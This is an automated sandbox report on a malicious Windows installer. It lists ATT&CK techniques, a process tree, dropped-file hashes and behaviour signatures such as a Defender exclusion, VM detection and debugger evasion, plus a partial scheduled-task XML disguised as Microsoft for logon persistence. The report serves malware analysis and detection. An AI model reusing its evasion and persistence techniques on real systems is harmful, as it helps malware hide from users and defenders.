Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_0071AB2A GetSystemTimeAsFileTime, 10_2_0071AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_007B0090 GetVersion, 10_2_007B0090
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Service Execution | 1 DLL Side-Loading | 1 Windows Service | 1 Disable or Modify Tools | LSASS Memory | 321 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Native API | Logon Script (Windows) | 111 Process Injection | 231 Virtualization/Sandbox Evasion | Security Account Manager | 231 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Access Token Manipulation | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 111 Process Injection | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Deobfuscate/Decode Files or Information | Cached Domain Credentials | 2 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | 3 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | 25 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1580229; Sample: #U5b89#U88c5#U52a9#U624b1.0.1.exe; Start date: 24/12/2024; Architecture: WINDOWS; Score: 84)

Signatures attached to the sample node:
  • Multi AV Scanner detection for submitted file
  • Found driver which could be used to inject code into processes
  • AI detected suspicious sample
  • Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process tree (dropped files and per-process signatures are listed under the process that produced them):
  • #U5b89#U88c5#U52a9#U624b1.0.1.exe
      dropped: C:\...\#U5b89#U88c5#U52a9#U624b1.0.1.tmp (PE32)
      • #U5b89#U88c5#U52a9#U624b1.0.1.tmp
          dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
          signature: Adds a directory exclusion to Windows Defender
          • #U5b89#U88c5#U52a9#U624b1.0.1.exe
              dropped: C:\...\#U5b89#U88c5#U52a9#U624b1.0.1.tmp (PE32)
              • #U5b89#U88c5#U52a9#U624b1.0.1.tmp
                  dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Program Files (x86)\Windows NT\hrsw.vbc (PE32); C:\Program Files (x86)\Windows NT\7zr.exe (PE32)
                  signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
                  • 7zr.exe
                      dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
                      • conhost.exe
                  • 7zr.exe
                      • conhost.exe
          • powershell.exe
              signature: Loading BitLocker PowerShell Module
              • conhost.exe
              • WmiPrvSE.exe
  • cmd.exe
      • sc.exe
          • conhost.exe
  • cmd.exe
      • sc.exe
          • conhost.exe
  • 31 other processes
      • sc.exe (three instances shown), each starting a conhost.exe
      • 27 other processes, starting a conhost.exe and 26 further processes

| Source | Detection | Scanner |
|---|---|---|
| #U5b89#U88c5#U52a9#U624b1.0.1.exe | 7% | Virustotal |
| #U5b89#U88c5#U52a9#U624b1.0.1.exe | 0% | ReversingLabs |

| Source | Detection | Scanner |
|---|---|---|
| C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs |
| C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
| C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
No Antivirus matches
No contacted domains info
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b1.0.1.exe | false | | high |
| https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000027A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F5CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000000.2046102925.0000000000CE1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000000.2069014707.0000000000CCD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr | false | | high |
| https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000027A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F5CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000000.2046102925.0000000000CE1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000000.2069014707.0000000000CCD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr | false | | high |
No contacted IP infos

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580229
Start date and time: 2024-12-24 04:51:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b1.0.1.exe (renamed because the original name is a hash value)
Original Sample Name: 1.0.1.exe
Detection: MAL
Classification: mal84.evad.winEXE@116/33@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 28
• Number of non-executed functions: 76
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 22:52:02 | API Interceptor | 1x Sleep call for process: #U5b89#U88c5#U52a9#U624b1.0.1.tmp modified |
| 22:52:05 | API Interceptor | 38x Sleep call for process: powershell.exe modified |
        No context
| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b_2.0.8.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b_2.0.8.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b_2.0.6.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b_2.0.6.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b_2.0.7.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b_2.0.7.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b_2.0.5.exe | malicious | Unknown |
| | #U5b89#U88c5#U52a9#U624b_2.0.4.exe | malicious | Unknown |

Process: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 831200
Entropy (8bit): 6.671005303304742
Encrypted: false
SSDEEP: 24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
MD5: 84DC4B92D860E8AEA55D12B1E87EA108
SHA1: 56074A031A81A2394770D4DA98AC01D99EC77AAD
SHA-256: BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
SHA-512: CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious
• Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious

Process: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type: data
Category: dropped
Size (bytes): 2603681
Entropy (8bit): 7.9999250486601365
Encrypted: true
SSDEEP: 49152:CAQF5rEv9l8kq6OyoWZqzEwn9192vEpJ9syz09uPhPTehqd9zQwp7N8WyAhlBi:GFxEFCwiWDwn91vJ9Dzhd90wpRgH
MD5: 3B9FD0924DB73BAA952BEB4A7BD7D6DE
SHA1: 66C0C97BBF4B25A31F35CB8029593B472BE5F056
SHA-256: 4A293DA92330E5FE2BD56DD600E245E2AB9BCAA15FA091BB04E60C6B23C3EF95
SHA-512: 41CD19F53535FBC592C050AE70B40BB82799A9A955B516446864961E5E559EAC2B6AA7E0A47BF89FAB5B38A754EC426076635E514C0D1E87BEBCAA66C5E8E402
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3606528
Entropy (8bit): 7.005604268954487
Encrypted: false
SSDEEP: 98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
MD5: 1047AF726D2E233D71934EF55E635C4A
SHA1: AB12E827E4E57DEA2E885733F0C48E9A83756678
SHA-256: 42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
SHA-512: 8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type: data
Category: dropped
Size (bytes): 2603681
Entropy (8bit): 7.9999250486601365
Encrypted: true
SSDEEP: 49152:CAQF5rEv9l8kq6OyoWZqzEwn9192vEpJ9syz09uPhPTehqd9zQwp7N8WyAhlBi:GFxEFCwiWDwn91vJ9Dzhd90wpRgH
MD5: 3B9FD0924DB73BAA952BEB4A7BD7D6DE
SHA1: 66C0C97BBF4B25A31F35CB8029593B472BE5F056
SHA-256: 4A293DA92330E5FE2BD56DD600E245E2AB9BCAA15FA091BB04E60C6B23C3EF95
SHA-512: 41CD19F53535FBC592C050AE70B40BB82799A9A955B516446864961E5E559EAC2B6AA7E0A47BF89FAB5B38A754EC426076635E514C0D1E87BEBCAA66C5E8E402
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type: OpenPGP Secret Key
Category: dropped
Size (bytes): 2353553
Entropy (8bit): 7.99992611421159
Encrypted: true
SSDEEP: 49152:rtfmdyArF7jC2uzD04c4vtHlkTmMVDfFv3ARw3ieIXzFj0nHfh:roDrBKxxlkq0fNAW3ieIXzuZ
MD5: 73616E6FB705D7163A2D8A391DDCAD6C
SHA1: 2ADEE96903C346D920E7B7B7527BE089F8388D87
SHA-256: 4AE1FF98AEC7817FF9E35A15118CFBD61CCF00C766ABE08C4EEFB58889EDF04E
SHA-512: 74D4726E6593783D062AFB2703C1B6465019C247DD2468B657AD95413BC4A3707F9D2695D9BE3CA51C9590A28C3ED22DDC52615F10F742A4432CD3A72A3A18FD
Malicious: false

Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56514
Entropy (8bit): 7.996871451143694
Encrypted: true
SSDEEP: 1536:mPAiXXCuGhffQfTWvMcdyw9W0wV/JQ+PX7D0sC1pr7MN2c3:mL5iQfTWvM9/S+/0fMAM
MD5: F8884F03FE2A94096CD9DB4DFFE29A40
SHA1: A139A68287F4E3FF9486273AA0E8CE16432CF819
SHA-256: 5D3E892B057465CC9D66CF84268CA7FBB040EF8A797653B99597E6E9DDA16D35
SHA-512: F3EAC63B1A4D05BAEC1CD79522D8B65EB9F72E6F72DD4A38C62FF90165067266A08E0CEC9A9DBF6E1C68D228B0E89D37A83C68B334AF22ADD23CD3E9C7F20390
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56514
Entropy (8bit): 7.9968714511436945
Encrypted: true
SSDEEP: 1536:HokFPP32DIjpUKb0m13fiDdCu3ELc3d5wbMjeYIcJLYuJUWLxMBRc:Ho4PP6gb0OYdCcELwYtYIcJL32WiBRc
MD5: F872271BC29C420B64116E4FA31D04DC
SHA1: E009BDDF7E43633678F6259524E8AFF6EC85103D
SHA-256: 081F6BD3EC3B5F9EE39F42942DD608C96134AE459734B031132DBF92ACBE751A
SHA-512: 1803172A6CD5BA42CA257F057602CBBCC511CCB85FE86495C5708A2AE6563C40966E27A2C8768B8363ABD1A4028EAB53C7F81BDFADE9384CAB99A71B9B509A2C
Malicious: false

Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996966859255975
Encrypted: true
SSDEEP: 1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
MD5: CEA69F993E1CE0FB945A98BF37A66546
SHA1: 7114365265F041DA904574D1F5876544506F89BA
SHA-256: E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
SHA-512: 4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996966859255979
Encrypted: true
SSDEEP: 1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
MD5: 4CB8B7E557C80FC7B014133AB834A042
SHA1: C42E2C861FF3ED0E6A11824E12F67A344E8F783D
SHA-256: 3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
SHA-512: A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
Malicious: false

Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 31890
Entropy (8bit): 7.99402458740637
Encrypted: true
SSDEEP: 768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
MD5: 8622FC7228777F64A47BD6C61478ADD9
SHA1: 9A7C15F341835F83C96DA804DC1E21FDA696BB56
SHA-256: 4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
SHA-512: 71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 31890
Entropy (8bit): 7.99402458740637
Encrypted: true
SSDEEP: 768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
MD5: CE6034AFC63BB42F4E0D6CD897DFBCB8
SHA1: 49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
SHA-256: 7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
SHA-512: 7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
Malicious: false

Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 74960
Entropy (8bit): 7.99759370165655
Encrypted: true
SSDEEP: 1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
MD5: 950338D50B95A25F494EE74E97B7B7A9
SHA1: F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
SHA-256: 87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
SHA-512: 9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
Malicious: false
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):74960
                            Entropy (8bit):7.997593701656546
                            Encrypted:true
                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                            Malicious:false
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):2603681
                            Entropy (8bit):7.999925048660142
                            Encrypted:true
                            SSDEEP:49152:LTl/YfOFTVDpw1I8zwTR8K4jZ4O2WLHPyoSnxD14cI7jnyODI6MXpqg4fy:LFyd6RC4+OoGU7jyO7MXQg4fy
                            MD5:58D8EBB349687B1D6069F6413C7E0391
                            SHA1:4D235DCCE39C99DD182D660964CE1EBA66427B06
                            SHA-256:5D181A626C632CFDAA81340AC6AC005EBA31A35BF69C7977D202E7F8F29D29AE
                            SHA-512:D421B3365A60FA10681B55BFEE5AC3C390EE48BFA4ACA1FF853A468FF6E64BF25FD837D7D93139AD3FF43C25DA21EADE791C6FE0B18D762D9D7D1FC06C0635C8
                            Malicious:false
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3449406240731085
                            Encrypted:false
                            SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                            MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                            SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                            SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                            SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:OpenPGP Secret Key
                            Category:dropped
                            Size (bytes):2353553
                            Entropy (8bit):7.99992611421159
                            Encrypted:true
                            SSDEEP:49152:rtfmdyArF7jC2uzD04c4vtHlkTmMVDfFv3ARw3ieIXzFj0nHfh:roDrBKxxlkq0fNAW3ieIXzuZ
                            MD5:73616E6FB705D7163A2D8A391DDCAD6C
                            SHA1:2ADEE96903C346D920E7B7B7527BE089F8388D87
                            SHA-256:4AE1FF98AEC7817FF9E35A15118CFBD61CCF00C766ABE08C4EEFB58889EDF04E
                            SHA-512:74D4726E6593783D062AFB2703C1B6465019C247DD2468B657AD95413BC4A3707F9D2695D9BE3CA51C9590A28C3ED22DDC52615F10F742A4432CD3A72A3A18FD
                            Malicious:false
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
